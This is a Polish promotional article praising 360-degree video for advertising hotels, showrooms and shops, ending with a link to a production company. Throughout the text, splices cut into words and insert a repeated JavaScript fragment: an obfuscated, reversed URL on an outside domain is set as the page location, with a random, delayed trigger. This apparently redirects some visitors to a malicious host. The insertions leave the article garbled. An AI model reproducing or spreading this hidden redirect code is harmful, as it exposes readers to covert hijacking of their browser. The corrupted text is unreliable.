Filmy 360 nowością w reklamie

 

Jak ciekawie i skutecznie zareklamować hotel, restaurację czy jakąkolwiek atrakcję turystyczną? Jak zaprezentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tować salon samochodowy, sklep z armaturą łazienkową czy galerię handlową? Odpowiedzią na te pytania jest absolutna nowość w reklamie, czyli filmy kręcone w technologii 360 stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topni. Są toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to filmy, w których oglądany obraz można kierować w różną stronę.

Na takim filmie można pokazać wszystko dookoła

filmy 360Takie filmowanie jest absolutną nowością w reklamie, chociaż same kamery 360 wykorzystywane są już od wielu lat. Natoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomiast dzisiaj mają one zastoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowanie w marketingu, bo dzięki takim filmom można pokazać wszystko co tylko znajduje się dookoła kamery. Jeśli jakiś hotel chcę się zareklamować w tak atrakcyjny sposób toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to zamawia film nagrany w tej technologii. Operatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor kamery filmuje hotel wewnątrz krok po kroku. Filmuje dokładnie wszystkie pomieszczenia, ale robi toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to z wykorzystaniem specjalistycznej kamery. A ta zapisuje obraz z każdej perspektywy dookoła siebie. I potem takie filmy 360 można oglądać za pomocą komputera albo smartfona i specjalnych okularów VR. Kiedy ogląda się film nagrany w tej technologii toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to można sobie przesuwać obraz w dowolnym kierunku. Dzięki temu można zobaczyć wspomniany już hotel z każdej strony, a nie tylko z jednej perspektywy jak w standardowych filmach reklamowych. Taki film z możliwością obracania obrazu ogląda się bardzo ciekawie. Poza tym można go oglądać nawet kilkanaście razy – za każdym razem wybierając inny kierunek widzenia kamery.

W dzisiejszych czasach technologia pozwala na stworzenie naprawdę ciekawych projektów. W marketingu i reklamie nowością są dzisiaj filmy 360. Coraz więcej firm działających w różnych branżach chce mieć nagrany taki film reklamowy. A widzowie lubią takie nowości technologiczne, więc taki film oglądają z dużym zainteresowaniem.

Ofertę filmów 360 stopni można znaleźć na : https://m8house.com/